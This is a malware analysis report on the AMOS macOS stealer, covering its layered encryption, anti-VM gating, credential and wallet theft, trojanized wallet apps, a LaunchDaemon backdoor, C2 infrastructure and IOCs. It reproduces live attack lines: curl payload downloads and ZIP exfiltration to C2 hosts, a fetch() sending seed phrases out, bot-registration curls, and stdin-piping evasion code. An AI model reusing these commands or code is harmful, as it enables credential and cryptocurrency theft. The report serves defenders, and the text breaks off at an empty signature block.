AMOS Stealer v3: Fully Decrypted -- Triple S-Box Encryption, Wallet Replacement Attacks, and a Three-Tier C2 Infrastructure
TL;DR: Two new AMOS (Atomic macOS Stealer) samples uploaded to MalwareBazaar reveal a significant evolution of the macOS stealer family. FGBOT fully decrypted the multi-layer encryption (SplitMix64 PRNG, triple S-box substitution, triplet encoding), live-downloaded and analyzed four second-stage payloads including trojanized Ledger/Trezor/Exodus wallet apps that phish BIP39 seed phrases, and mapped a three-tier C2 infrastructure spanning bulletproof hosting, offshore VPS, and Cloudflare-proxied domains -- all confirmed active and collecting stolen data as of March 4, 2026.
The Big Picture: From Infostealer to Crypto Supply Chain Attack
This campaign is not just credential theft. The AMOS operator has bolted a full cryptocurrency supply chain attack onto the stealer framework: after harvesting passwords, browser data, and wallet files, the malware silently replaces legitimate Ledger, Trezor, and Exodus desktop applications with trojanized clones that phish 24-word BIP39 recovery phrases. Stolen seed phrases are exfiltrated to a dedicated Cloudflare-fronted server (systellis.com) that was live and actively receiving data at the time of analysis. A persistent backdoor (kito) maintains long-term access via a separate C2 at 45.94.47.204, ensuring the operator retains control even if the stealer C2 is taken down.
These samples share identical infrastructure with the AMOS v1 variants we analyzed from the OpenClaw campaign two days prior -- same primary C2 IP (38.244.158.103), same backup domain (avipstudios.com), same bulletproof hosting provider (3NT Solutions). The encryption, however, has been substantially upgraded. The threat actor behind this -- tracked by CrowdStrike as COOKIE SPIDER -- is iterating rapidly.
Sample Overview
| Property | kakkaa_puolaan (Stage 1) | helper (Stage 2) |
|---|---|---|
| SHA-256 | 65336d043397311f7995ff147fdc769bd8f6ac49ad8d09b4e716adeff560ec5c | 6f0e8713ff4143f107aa610252aff265035220c2b10ce2023c942d9df7565bef |
| MD5 | 23f19858146c3e8bcbed70d5e4851f4c | 242341a776aea09b128fd306b3a63d3a |
| Size | 3,242,424 bytes (3.1 MB) | 4,328,440 bytes (4.3 MB) |
| Format | Mach-O FAT (x86_64 + arm64) | Mach-O FAT (x86_64 + arm64) |
| Detection | Kaspersky: HEUR:Trojan-PSW.OSX.Amos.bk | ClamAV: MacOS.AMOS-CZ |
| Shell | /bin/sh -s (piped stdin) | /bin/zsh -c (command arg) |
| Role | Dropper/loader with anti-VM gating | Full stealer + persistence |
| Reporter | smica83 (Szabolcs Schmidt) | smica83 |
Both are Universal FAT Mach-O binaries. 98-99% of each binary is encrypted payload stored in __TEXT.__const. The actual machine code in __TEXT.__text is only 7-10 KB. The import table is minimal -- only libc++.1.dylib and libSystem.B.dylib -- because all stealing functionality is delegated to decrypted AppleScript and shell commands at runtime.
Encryption Architecture: Four Layers Deep
The encryption has been substantially upgraded from AMOS v1. Each layer must be peeled in sequence.
Layer 1: Custom Base64 with Per-Build Randomized Alphabets
Each build uses a unique 64-character alphabet generated at runtime from 5 lookup tables embedded in __const. The alphabets recovered from these samples:
kakkaa: F6zElu1TgB(Y&J+*)Hkr<7$=_qUOo-Q>2vA?Z%Kt0@sdVGRPe4m9pLiIS8#aWMCj
helper: Em!WgB=0GLyMAXzZ(a1PeRohlcqUrNbTYfn>j4HC9K2I5@k$OQD-Ji8+?pS_67<3
The alphabet generation function iterates 128 times over the lookup tables, applying ROTR8(tableA[i] - tableB[i], tableC[i] & 7) XOR tableD[i] - tableE[i] to produce 128 hex digits that decode to the 64-character alphabet. Because the lookup tables differ per build, signature-based detection on the alphabet is ineffective.
Layer 2: Hex Encoding
Base64-decoded bytes are hex-encoded, producing a 2x size expansion. This is a straightforward obfuscation layer that complicates pattern matching on the intermediate representation.
Layer 3: S-Box Substitution with Rolling XOR
A 256-byte bijective permutation table (S-box) is applied with a rolling XOR cipher:
```python
def sbox_rolling_xor(data: bytes, sbox: bytes, initial_key: int) -> bytes:
    # initial_key: 0xFF for kakkaa, 0x05 for helper; sbox is the 256-byte permutation
    key = initial_key
    output = bytearray()
    for i, byte in enumerate(data):
        substituted = sbox[byte ^ key]
        key = ((key ^ substituted) + i) & 0xFF   # the key rolls with every output byte
        output.append(substituted)
    return bytes(output)
```
The kakkaa sample uses three independent S-boxes (768 bytes total), a significant increase in complexity over v1's single S-box. All S-boxes are perfect 256-byte permutations with unique values -- they are regenerated per build by the AMOS builder, making S-box-value-based YARA rules useless.
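To make the peel order concrete, the following is an added example written for this write-up, not code from the report or from the malware itself. It implements layers 1 to 3 in Python: an unpadded base64 codec over the per-build alphabets recovered above, the rolling-XOR S-box pass as the report states it, and the inverse pass that an analyst actually needs. Several things are assumptions of the example rather than facts from the report: the S-box (a seeded random permutation standing in for a real per-build table), the sample plaintext, the positional alphabet mapping with no padding symbol (both recovered alphabets contain "=", so RFC padding cannot be in use unchanged), and the builder-side ordering (S-box, then hex, then custom base64). The report does not say whether its snippet is the builder's forward transform or the dropper's decryption routine; if it is the latter, the two S-box functions simply swap roles.

```python
import random

# Per-build custom base64 alphabets recovered from the two samples (values from the
# report). This example assumes the standard positional mapping (6-bit value i maps
# to alphabet[i]) and no padding symbol; '=' occurs inside both alphabets, so RFC
# padding could not be used unchanged.
KAKKAA_ALPHABET = "F6zElu1TgB(Y&J+*)Hkr<7$=_qUOo-Q>2vA?Z%Kt0@sdVGRPe4m9pLiIS8#aWMCj"
HELPER_ALPHABET = "Em!WgB=0GLyMAXzZ(a1PeRohlcqUrNbTYfn>j4HC9K2I5@k$OQD-Ji8+?pS_67<3"


def check_alphabet(alphabet: str) -> None:
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct symbols")


def custom_b64_encode(data: bytes, alphabet: str) -> str:
    """Layer 1, builder side: unpadded base64 over a per-build alphabet."""
    check_alphabet(alphabet)
    bits = "".join(f"{b:08b}" for b in data)
    bits += "0" * (-len(bits) % 6)                     # pad bit string to a 6-bit boundary
    return "".join(alphabet[int(bits[i:i + 6], 2)] for i in range(0, len(bits), 6))


def custom_b64_decode(text: str, alphabet: str) -> bytes:
    """Layer 1, analyst side: invert the alphabet, drop the trailing partial byte."""
    check_alphabet(alphabet)
    value = {c: i for i, c in enumerate(alphabet)}
    bits = "".join(f"{value[c]:06b}" for c in text)
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def make_demo_sbox(seed: int) -> bytes:
    """Constructed stand-in for a per-build S-box: a seeded 256-byte permutation."""
    table = list(range(256))
    random.Random(seed).shuffle(table)
    return bytes(table)


def sbox_rolling_xor(data: bytes, sbox: bytes, initial_key: int) -> bytes:
    """Layer 3 exactly as the report describes it (0xFF for kakkaa, 0x05 for helper)."""
    key = initial_key
    out = bytearray()
    for i, byte in enumerate(data):
        substituted = sbox[byte ^ key]
        key = ((key ^ substituted) + i) & 0xFF
        out.append(substituted)
    return bytes(out)


def sbox_rolling_xor_inverse(data: bytes, sbox: bytes, initial_key: int) -> bytes:
    """Undo layer 3. The S-box is a bijection, so invert the table; the key schedule
    depends only on the previous key and the substituted byte, both of which the
    decoder already has, so it can be replayed byte by byte."""
    if sorted(sbox) != list(range(256)):
        raise ValueError("S-box is not a 256-byte permutation")
    inverse = bytearray(256)
    for i, v in enumerate(sbox):
        inverse[v] = i
    key = initial_key
    out = bytearray()
    for i, substituted in enumerate(data):
        out.append(inverse[substituted] ^ key)
        key = ((key ^ substituted) + i) & 0xFF
    return bytes(out)


def wrap_layers(plaintext: bytes, sbox: bytes, initial_key: int, alphabet: str) -> str:
    """Builder order assumed here: S-box/XOR, then hex (layer 2), then custom base64."""
    layer3 = sbox_rolling_xor(plaintext, sbox, initial_key)
    return custom_b64_encode(layer3.hex().encode("ascii"), alphabet)


def peel_layers(blob: str, sbox: bytes, initial_key: int, alphabet: str) -> bytes:
    """Analyst order, the way the report peels them: base64 -> hex -> S-box inverse."""
    hex_text = custom_b64_decode(blob, alphabet).decode("ascii")
    return sbox_rolling_xor_inverse(bytes.fromhex(hex_text), sbox, initial_key)


if __name__ == "__main__":
    sbox = make_demo_sbox(seed=7)
    script = b'do shell script "system_profiler SPHardwareDataType"'   # constructed sample
    blob = wrap_layers(script, sbox, 0xFF, KAKKAA_ALPHABET)
    print(blob)
    print(peel_layers(blob, sbox, 0xFF, KAKKAA_ALPHABET) == script)
```

The practical point is in `sbox_rolling_xor_inverse`: because every S-box the builder emits is a full permutation, a recovered table plus the initial key is enough to strip layer 3 without ever executing the sample, and the same inverse works for all three kakkaa tables applied in turn. Layer 4 (triplet encoding) and the kakkaa SplitMix64 keystream are deliberately left out; the report gives their constants but not enough of the algorithm to reproduce them faithfully.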
Layer 4: Triplet Encoding (12x Size Expansion)
Each output byte is encoded as three uint32 values (12 bytes per character), producing a 12x size expansion. Two decoding formulas were identified:
Primary: byte = ((val2 * 3) XOR val1) >> shift - val2
Dual-table: byte = (val1 >> 16) XOR (val1 - val2) & 0xFF
A golden ratio constant (0x9E3779B1) is used for rolling integrity hashing, enabling tamper detection on the encoded data before decryption proceeds.
kakkaa-Specific: SplitMix64 PRNG Keystream
The kakkaa dropper adds a fifth layer: a SplitMix64-style PRNG (constant 0x59542DB0CCF620CB) generates the decryption keystream. The PRNG is seeded with ASLR-dependent entropy -- XOR of the stack address, the _exit function pointer, and a hardcoded constant (0x6748BC23BC17CD73). This makes static decryption infeasible without reimplementing the full PRNG state machine or executing the binary.
The PRNG state evolves through a 4-way switch table based on state & 3:
Case 0: add + shr >> 3 + XOR
Case 1: add + sub + movzx + XOR
Case 2: shrd rotation by 37 + shr >> 5 + XOR
Case 3: default mixing path
This is the most sophisticated encryption we have observed in the AMOS family to date.
Execution Flow: Pipe-Based Evasion
The kakkaa dropper introduces a significant evasion upgrade over previous AMOS versions. Rather than passing the decrypted payload as a command-line argument (visible in ps output), it streams the payload through a pipe to /bin/sh stdin:
```c
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/* Stream an already-decrypted script to /bin/sh over its stdin so the script
 * text never appears in argv (behaviour reconstructed from the kakkaa dropper). */
static int run_via_pipe(const char *payload, size_t payload_len, useconds_t delay)
{
    int fd[2];
    int status = 0;
    if (pipe(fd) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Child: redirect stdin to the pipe's read end, then read commands from it */
        dup2(fd[0], STDIN_FILENO);
        close(fd[0]); close(fd[1]);
        execl("/bin/sh", "sh", "-s", (char *)NULL);
        _exit(127);
    }
    /* Parent: write the decrypted payload in 64-byte chunks with a delay between them */
    close(fd[0]);
    for (size_t offset = 0; offset < payload_len; offset += 64) {
        size_t remaining = payload_len - offset;
        write(fd[1], payload + offset, remaining < 64 ? remaining : 64);
        usleep(delay);
    }
    close(fd[1]);
    waitpid(pid, &status, 0);
    return status;
}
```
Process monitoring tools would only see /bin/sh -s -- the 65 KB decrypted AppleScript payload never appears in the process argument list. EDR rules that rely on command-line inspection will miss this entirely.
The helper stage reverts to the simpler fork() + execvp("/bin/zsh", ["-c", payload]) pattern. This suggests the AMOS builder now supports multiple delivery profiles optimized for different stages of the attack chain.
Anti-VM Checks
Both samples execute identical anti-VM gating before proceeding to payload execution. The check is decrypted and run via osascript:
```applescript
set memData to do shell script "system_profiler SPMemoryDataType"
set hardwareData to do shell script "system_profiler SPHardwareDataType"
if memData contains "QEMU" or memData contains "VMware" or memData contains "KVM" or ¬
    hardwareData contains "Z31FHXYQ0J" or hardwareData contains "C07T508TG1J2" or ¬
    hardwareData contains "C02TM2ZBHX87" or hardwareData contains "Chip: Unknown" or ¬
    hardwareData contains "Intel Core 2" then
    set exitCode to 100
else
    set exitCode to 0
end if
```
Exit code 100 causes the malware to abort. Exit code 0 proceeds to payload execution. The VM serial numbers (Z31FHXYQ0J, C07T508TG1J2, C02TM2ZBHX87) are known sandbox indicators. This anti-VM capability is new in v3 -- the v1 OpenClaw samples had no such checks.
Stealer Capabilities (Fully Decrypted)
The helper stage 2 payload was fully decrypted: a 65,018-byte AppleScript with 275 obfuscated string fragments using numeric array encoding with random offsets.
Credential Harvesting
The stealer displays a fake system dialog to phish the user's macOS password:
"Required Application Helper. Please enter device password to continue." Title: "Application wants to install helper"
The password is validated via dscl . authonly <username> <password>. On success, the keychain (~/Library/Keychains/login.keychain-db) and Chrome Safe Storage password (security find-generic-password -ga "Chrome") are stolen.
Browser Data Theft
12 Chromium-based browsers targeted, stealing cookies, login data, web data (autofill/credit cards), history, extension settings, local storage, and IndexedDB per browser:
| Browser | Path |
|---|---|
| Google Chrome | Google/Chrome/ |
| Chrome Beta/Canary/Dev | Google/Chrome Beta/, Canary, Dev/ |
| Chromium | Chromium/ |
| Brave | BraveSoftware/Brave-Browser/ |
| Microsoft Edge | Microsoft Edge/ |
| Vivaldi | Vivaldi/ |
| Opera / Opera GX | com.operasoftware.Opera/, OperaGX/ |
| Arc | Arc/User Data/ |
| CocCoc | CocCoc/Browser/ |
2 Firefox-based browsers (Firefox, Waterfox): cookies.sqlite, key4.db, logins.json, formhistory.sqlite, places.sqlite, plus MetaMask extension data.
Safari: Cookies.binarycookies from multiple container paths.
Cryptocurrency Wallet Theft
264 browser extension IDs are targeted, covering MetaMask, Phantom, TronLink, Coinbase Wallet, Trust Wallet, OKX Wallet, Rabby, Keplr, Argent X, SafePal, and hundreds more.
18 desktop wallet applications are raided:
| Wallet | Target Path |
|---|---|
| Electrum / Electrum LTC / Electron Cash | ~/.electrum/wallets/, etc. |
| Exodus | Exodus/ |
| Atomic Wallet | atomic/Local Storage/leveldb/ |
| Ledger Live | Ledger Live/ |
| Trezor Suite | @trezor/suite-desktop/ |
| Bitcoin/Litecoin/Dash/Dogecoin Core | Bitcoin/wallets/, etc. |
| Monero | /Monero/wallets/ |
| Coinomi / Guarda / Wasabi / Sparrow | Various paths |
| TonKeeper | @tonkeeper/desktop/config.json |
| Binance | Binance/app-store.json |
Wallet Replacement Attack (New in v3)
After stealing wallet data, the malware downloads trojanized wallet apps from wusetail.com and replaces legitimate installations:
# Example: Ledger Wallet replacement
```bash
curl https://wusetail.com/zxc/app.zip -o /tmp/app.zip
pkill "Ledger Wallet"
sudo -S rm -r "/Applications/Ledger Wallet.app"
ditto -x -k /tmp/app.zip /Applications
chmod -R +x "/Applications/Ledger Wallet.app"
```
The same process is applied to Trezor Suite (apptwo.zip) and Exodus (appex.zip).
Trojanized Wallet Analysis
All three trojanized wallets were live-downloaded and analyzed:
| Property | Fake Ledger | Fake Trezor | Fake Exodus |
|---|---|---|---|
| SHA-256 | 1f53767cebbaa534... | 666644322c3cd19d... | a843b479ed34514f... |
| Bundle ID | com.led.mas | com.app.moso | test.exodus-web-app |
| Framework | Swift + SwiftUI + WKWebView | Same | Same |
| Build | Xcode 2620, macOS SDK 26.2 | Same | Same |
| Exfil URL | systellis.com/receive.php | systellis.com/receivet.php | systellis.com/receiveex.php |
| Languages | EN, FR, DE, ES, IT | Same | Same |
Each app is a native macOS application using WKWebView to load bundled phishing HTML. A WKScriptMessageHandler bridges JavaScript to Swift. The social engineering lure is multi-language: "Suspicious activity was detected on your device" -- followed by a prompt for the 24-word BIP39 recovery phrase.
The exfiltration protocol uses double-base64 encoding:
```javascript
const encodedUsername = btoa(username);
const encodedSeed = btoa(seedPhrase);
const securedData = { username: encodedUsername, seed: encodedSeed };
const encodedSecuredHeader = btoa(JSON.stringify(securedData));
fetch("https://systellis.com/receive.php", {
  method: "POST",
  headers: {
    "Content-Type": "application/json",
    "Secured": encodedSecuredHeader // double-base64 exfil header
  },
  body: JSON.stringify({ username: encodedUsername, seed: encodedSeed })
});
```
systellis.com was registered on 2026-02-24, uses Cloudflare nameservers, and was confirmed active -- all three /receive*.php endpoints return 405 on GET (POST-only), with CORS headers exposing the Secured custom header. This server is actively collecting stolen seed phrases.
Persistence Mechanism
The stealer installs a LaunchDaemon using the phished password for sudo access:
```xml
<!-- /Library/LaunchDaemons/com.finder.helper.plist -->
<plist version="1.0">
<dict>
  <key>Label</key><string>com.finder.helper</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>/.agent</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
```
The /.agent script downloads a persistence binary:
```bash
curl -o /.mainhelper https://wusetail.com/zxc/kito
chmod +x /.mainhelper
```
A loop then runs /.mainhelper as the logged-in console user via osascript, ensuring it survives logouts and reboots.
Persistence Backdoor: kito (Fully Decrypted)
The kito binary (SHA-256: 5c801591a075d654ce96f14651a82af80bbe16dbe50e9400b567834e6259691a) was fully decrypted -- all 13 encrypted states resolved. It uses the same AMOS encryption engine with multiple variants (5-table rotation, dual-table, triplet, S-box+XOR).
Decrypted State Map
| State | Content | Purpose |
|---|---|---|
| 0 | Custom base64 alphabet (64 chars) | Decryption bootstrap |
| 1 | Anti-VM script (536 bytes) | VM gating |
| 2 | /tmp/.botlock | Single-instance lock file |
| 4 | /.id | Bot identity file path |
| 5 | /.mainhelper | Self binary path |
| 6 | curl -s -X POST http://45.94.47.204/api/join/ -d ' | Bot registration |
| 7 | curl -s 'http://45.94.47.204/api/tasks/ | Command polling |
| 8 | delete | Self-destruct command |
| 9 | repeat; | Re-execute command |
| 10 | execute; | Run arbitrary shell command |
| 11 | pong | Heartbeat response |
| 12 | rm -f | Self-delete prefix |
Bot Protocol
- Check for a VM; abort if detected.
- Create the lock file `/tmp/.botlock` (prevents multiple instances).
- Read or generate the bot ID at `/.id`.
- Register with the C2: `POST http://45.94.47.204/api/join/`.
- Poll for tasks: `GET http://45.94.47.204/api/tasks/<bot_id>`.
- Execute received commands (`execute;`), repeat the previous one (`repeat;`), or self-delete (`delete` triggers `rm -f /.mainhelper`).
This gives the AMOS operator persistent remote code execution on compromised machines, independent of the initial stealer exfiltration.
C2 Infrastructure: Three-Tier Architecture
The campaign uses three separate C2 tiers, each serving a distinct function:
Tier 1: Stealer Exfiltration -- 38.244.158.103
| Property | Value |
|---|---|
| Endpoint | http://38.244.158.103/contact |
| ASN | AS58061 (Scalaxy B.V., Latvia) |
| Hosting | 3NT SOLUTIONS LLP (UK LLP, OC363382) |
| Physical Location | Ketelskamp 10, Meppel, Netherlands |
| Block | 38.244.158.0/24 (CLOUD-NETWORK-NL) |
3NT Solutions is a documented bulletproof hosting provider tracked by security researchers since 2014. Designated members are shell companies registered in Belize (DARL IMPEX LTD, LEGRANT TRADING LTD). The same /24 subnet hosts 38.244.158.56, a confirmed AMOS "malext" variant C2 documented by researcher fab0 -- indicating a dedicated AMOS C2 cluster.
Stolen data is exfiltrated as a ZIP archive via HTTP POST with custom headers:
```bash
curl --connect-timeout 120 --max-time 300 -X POST \
  -H "user: <username>" -H "BuildID: <build_id>" \
  -H "cl: <client_info>" -H "cn: <computer_name>" \
  -F "file=@/tmp/out.zip" \
  http://38.244.158.103/contact
```
Backup C2: https://avipstudios.com/contact -- a hijacked expired domain (legitimate since 2019, re-registered 2026-02-23) proxied through Cloudflare, with the origin server confirmed as 38.244.158.103 via identical CSP headers.
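Both exfiltration shapes described on this page, the stealer's multipart upload to `/contact` with the `user`/`BuildID`/`cl`/`cn` headers, and the wallet clones' double-base64 `Secured` header from the Trojanized Wallet Analysis section, are simple enough to triage straight from a packet capture. The following is an added example written for this write-up, not code from the report or the malware: a minimal HTTP request parser, a decoder for the `Secured` header, and a classifier that returns the fields an analyst wants from each. The sample requests are constructed (header layout from the curl command and the fetch() call above; the BuildID is one of the two listed under Binary Signatures; the username, hostname and the BIP39 test-vector seed phrase are placeholders), and the `HttpRequest`/`triage` names are this example's own.

```python
import base64
import json
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)   # names lower-cased
    body: bytes = b""


def parse_http_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request-line and header parser for captured traffic
    (enough for pcap triage, not a production parser)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def decode_secured_header(value: str) -> Dict[str, str]:
    """Undo the wallet clone's double base64: header -> JSON -> base64 per field."""
    outer = json.loads(base64.b64decode(value))
    return {k: base64.b64decode(v).decode("utf-8") for k, v in outer.items()}


def triage(req: HttpRequest) -> Optional[dict]:
    """Classify one captured request against the two exfil shapes in the report and
    pull out the fields an analyst needs; None if it matches neither."""
    if req.method != "POST":
        return None
    host = req.headers.get("host", "")
    # Stealer exfil: POST /contact with user/BuildID/cl/cn headers and a ZIP upload.
    if req.path == "/contact" and "buildid" in req.headers:
        return {
            "kind": "amos_stealer_exfil",
            "host": host,
            "user": req.headers.get("user"),
            "build_id": req.headers["buildid"],
            "client": req.headers.get("cl"),
            "computer": req.headers.get("cn"),
            "zip_upload": b"PK\x03\x04" in req.body,     # local-file header of a ZIP
        }
    # Seed-phrase exfil: POST /receive*.php carrying the double-base64 Secured header.
    if req.path.startswith("/receive") and "secured" in req.headers:
        return {"kind": "seed_phrase_exfil", "host": host,
                **decode_secured_header(req.headers["secured"])}
    return None


def build_seed_exfil_sample(username: str, seed: str) -> bytes:
    """Constructed request with the exact encoding of the wallet clone's fetch() call."""
    enc_user = base64.b64encode(username.encode()).decode()
    enc_seed = base64.b64encode(seed.encode()).decode()
    payload = json.dumps({"username": enc_user, "seed": enc_seed})
    secured = base64.b64encode(payload.encode()).decode()
    head = (
        "POST /receive.php HTTP/1.1\r\nHost: systellis.com\r\n"
        f"Content-Type: application/json\r\nSecured: {secured}\r\n"
        f"Content-Length: {len(payload)}\r\n\r\n"
    )
    return head.encode() + payload.encode()


# Constructed stealer upload: header names from the curl command, BuildID from the report.
STEALER_SAMPLE = (
    b"POST /contact HTTP/1.1\r\nHost: 38.244.158.103\r\nuser: alice\r\n"
    b"BuildID: xFsGFKxHG2Bb6HUsGs4wSMqw/K7GC1rlhPrmG0FaOvE=\r\n"
    b"cl: macOS 15.3\r\ncn: alices-mbp\r\n"
    b"Content-Type: multipart/form-data; boundary=b\r\n\r\n"
    b'--b\r\nContent-Disposition: form-data; name="file"; filename="out.zip"\r\n'
    b"Content-Type: application/zip\r\n\r\nPK\x03\x04\x14\x00...\r\n--b--\r\n"
)

if __name__ == "__main__":
    # Placeholder seed (the BIP39 test vector), not a real victim's phrase.
    sample = build_seed_exfil_sample("alice", "abandon abandon abandon about")
    print(triage(parse_http_request(sample)))
    print(triage(parse_http_request(STEALER_SAMPLE)))
```

Two details matter for detection rules built from this. The seed exfil rides over HTTPS to a Cloudflare-fronted host, so the `Secured` header is only visible with TLS inspection or on the endpoint; the stealer upload, by contrast, is plain HTTP to a bare IP, so the `BuildID` header and the `PK` magic in the multipart body are directly matchable on the wire.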
Tier 2: Persistent Backdoor C2 -- 45.94.47.204
| Property | Value |
|---|---|
| Endpoint | http://45.94.47.204/api/ |
| ASN | AS207461 |
| Hosting | rapidseedbox.com |
| Registration | Global Gateway 8, Providence, Mahe, Seychelles |
Different physical server than the stealer C2 (different SSH fingerprints) but identical C2 panel software (matching CSP headers). The API endpoint at /api/tasks/ returns 400 Bad Request, confirming it is active and expecting parameters.
Tier 3: Seed Phrase Exfiltration -- systellis.com
| Property | Value |
|---|---|
| Endpoints | /receive.php, /receivet.php, /receiveex.php |
| Registrar | Hello Internet Corp (hello.co) |
| Created | 2026-02-24 |
| CDN | Cloudflare (104.21.39.165, 172.67.146.196) |
| Status | LIVE -- actively collecting seed phrases |
This three-tier separation provides operational resilience. Takedown of one C2 does not affect the others.
Domain Rotation and Expired Domain Hijacking
All campaign domains were registered through Hello Internet Corp (IANA ID 1924):
| Domain | Created | Role | Status |
|---|---|---|---|
| avipstudios.com | 2026-02-23 | Backup C2 | Active |
| systellis.com | 2026-02-24 | Seed phrase exfil | Active |
| wusetail.com | 2026-03-02 | Payload distribution | Active |
| malext.com | 2026-02-02 | Earlier C2 | Unknown |
| raytherrien.com | 2026-02-12 | Payload delivery | Unknown |
Both avipstudios.com and wusetail.com are hijacked expired domains with years of legitimate history. avipstudios.com was associated with a video production company (Richard Langsmith / Digital Reality Inc) since 2019. wusetail.com was a restaurant loyalty SaaS platform (2023-2025) serving clients including Slim Chickens and Noodles & Company. The AMOS operator deliberately acquires expired domains with long histories to inherit residual domain reputation and bypass URL filtering -- a documented TTP for this threat actor.
The registrar rotation pattern also shifted over time: WebNic.cc (2025) to Mat Bao Corp, Vietnam (mid-2025) to Hello Internet Corp (2026), reducing the risk of simultaneous domain seizure.
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| AppleScript Execution | T1059.002 | Payload executed via osascript |
| Unix Shell | T1059.004 | Commands via /bin/sh -s and /bin/zsh -c |
| GUI Input Capture | T1056.002 | Fake password dialog |
| Input Capture: Web Portal | T1056.003 | Fake wallet seed phrase forms |
| Keychain | T1555.001 | login.keychain-db theft |
| Browser Credentials | T1555.003 | Chrome/Firefox password databases |
| Steal Web Session Cookies | T1539 | Browser cookie databases |
| Data from Local System | T1005 | File grabber, wallet files, Apple Notes |
| Archive Collected Data: Archive via Utility | T1560.001 | ditto/zip compression |
| Exfiltration Over C2 | T1041 | HTTP POST to C2 with ZIP archive |
| Create or Modify System Process: Launch Daemon | T1543.004 | LaunchDaemon com.finder.helper |
| Supply Chain Compromise | T1195.002 | Trojanized Ledger/Trezor/Exodus apps |
| Virtualization/Sandbox Evasion | T1497.001 | system_profiler VM checks |
| Deobfuscate/Decode | T1140 | Multi-layer decryption engine |
| Obfuscated Files | T1027 | Encrypted payloads, numeric string encoding |
| Masquerading | T1036 | com.finder.helper mimics Finder |
| Acquire Infrastructure: Domains | T1583.001 | Expired domain hijacking |
| Multi-Stage Channels | T1104 | Split C2 across 3 tiers |
| Application Layer Protocol | T1071.001 | HTTP-based bot C2 (join/tasks API) |
| Remote Access Software | T1219 | kito backdoor with execute/delete/heartbeat |
Evolution from AMOS v1
| Feature | AMOS v1 (OpenClaw, Mar 2) | AMOS v3 (This Campaign, Mar 4) |
|---|---|---|
| C2 IP | 38.244.158.103 | Same |
| Binary format | Single-arch Mach-O | Universal FAT (x86_64 + arm64) |
| S-box layers | 1 | 3 (kakkaa), 1 (helper) |
| Encryption | Rolling XOR (key 0x5C) | SplitMix64 PRNG + multi-pass |
| Anti-VM | None | system_profiler checks |
| Wallet replacement | None | Ledger, Trezor, Exodus |
| Pipe execution | No | Yes (kakkaa -- stdin streaming) |
| Persistent backdoor | No | Yes (kito via LaunchDaemon) |
| Seed phrase phishing | No | Yes (trojanized wallet apps) |
| Size (v1 binary vs. helper) | 578 KB | 4,227 KB (7.3x growth) |
The code size in __text remains nearly identical (7-10 KB) across all versions -- the hallmark of a shared builder framework. The growth is entirely in encrypted payload and encoding overhead.
Indicators of Compromise
Network Indicators
| Type | Indicator | Context |
|---|---|---|
| IP | 38.244.158.103 | Primary C2 -- stealer exfil (3NT Solutions, AS58061) |
| IP | 38.244.158.56 | Related AMOS "malext" C2 in same /24 |
| IP | 45.94.47.204 | Backdoor C2 -- bot registration/tasking (AS207461) |
| Domain | avipstudios.com | Backup C2 (Cloudflare-proxied) |
| Domain | wusetail.com | Payload distribution server |
| Domain | systellis.com | Seed phrase exfiltration |
| Domain | malext.com | Earlier AMOS C2 |
| Domain | raytherrien.com | Earlier payload delivery |
| URL | http://38.244.158.103/contact | Stealer data exfil endpoint |
| URL | http://45.94.47.204/api/join/ | Bot registration |
| URL | http://45.94.47.204/api/tasks/ | Bot command polling |
| URL | https://systellis.com/receive.php | Ledger seed exfil |
| URL | https://systellis.com/receivet.php | Trezor seed exfil |
| URL | https://systellis.com/receiveex.php | Exodus seed exfil |
| URL | https://wusetail.com/zxc/app.zip | Trojanized Ledger |
| URL | https://wusetail.com/zxc/apptwo.zip | Trojanized Trezor |
| URL | https://wusetail.com/zxc/appex.zip | Trojanized Exodus |
| URL | https://wusetail.com/zxc/kito | Persistence binary |
| CIDR | 38.244.158.0/24 | Recommended block (AMOS C2 cluster) |
| CIDR | 45.94.47.0/24 | Recommended block (backdoor C2 subnet) |
File Indicators
| Type | Hash | Description |
|---|---|---|
| SHA-256 | 65336d043397311f7995ff147fdc769bd8f6ac49ad8d09b4e716adeff560ec5c | kakkaa_puolaan (Stage 1 dropper) |
| SHA-256 | 6f0e8713ff4143f107aa610252aff265035220c2b10ce2023c942d9df7565bef | helper (Stage 2 stealer) |
| SHA-256 | 16c26d16c7dd983c2229725b9d7be5b1684c99088e3b2d87a3beef23475b1133 | app.zip (trojanized Ledger) |
| SHA-256 | f4ad4a62213f5c6a7f0ad6cd9ce0ad1ecdb3913bfdc35823556fe569ba4c6523 | apptwo.zip (trojanized Trezor) |
| SHA-256 | 2f1ce625f10b37520917fbc76704af55799f1f0120725832778236792c44bf55 | appex.zip (trojanized Exodus) |
| SHA-256 | 5c801591a075d654ce96f14651a82af80bbe16dbe50e9400b567834e6259691a | kito (persistence backdoor) |
| SHA-256 | 1f53767cebbaa534fdcdfa40710a79dd7e6dd9c40bf0a02d759957da34c25275 | Trojanized Ledger binary |
| SHA-256 | 666644322c3cd19dd06b5e0a4484178b3e3a9b7c40cf8494971798d08c0133be | Trojanized Trezor binary |
| SHA-256 | a843b479ed34514f9bedc0d8b5256c79706e3305cecd37e38873411c815dde30 | Trojanized Exodus binary |
Host Indicators
| Path | Purpose |
|---|---|
| /Library/LaunchDaemons/com.finder.helper.plist | Persistence LaunchDaemon |
| /.agent | Bash wrapper for persistence loop |
| /.mainhelper | Downloaded backdoor binary |
| /.id | Bot identity file |
| /.logged | Tracking file |
| /.pass | Stolen password cache |
| /.username | Stolen username cache |
| /tmp/.botlock | Bot single-instance lock |
| /tmp/out.zip | Exfiltration archive |
Binary Signatures (YARA-Compatible)
```text
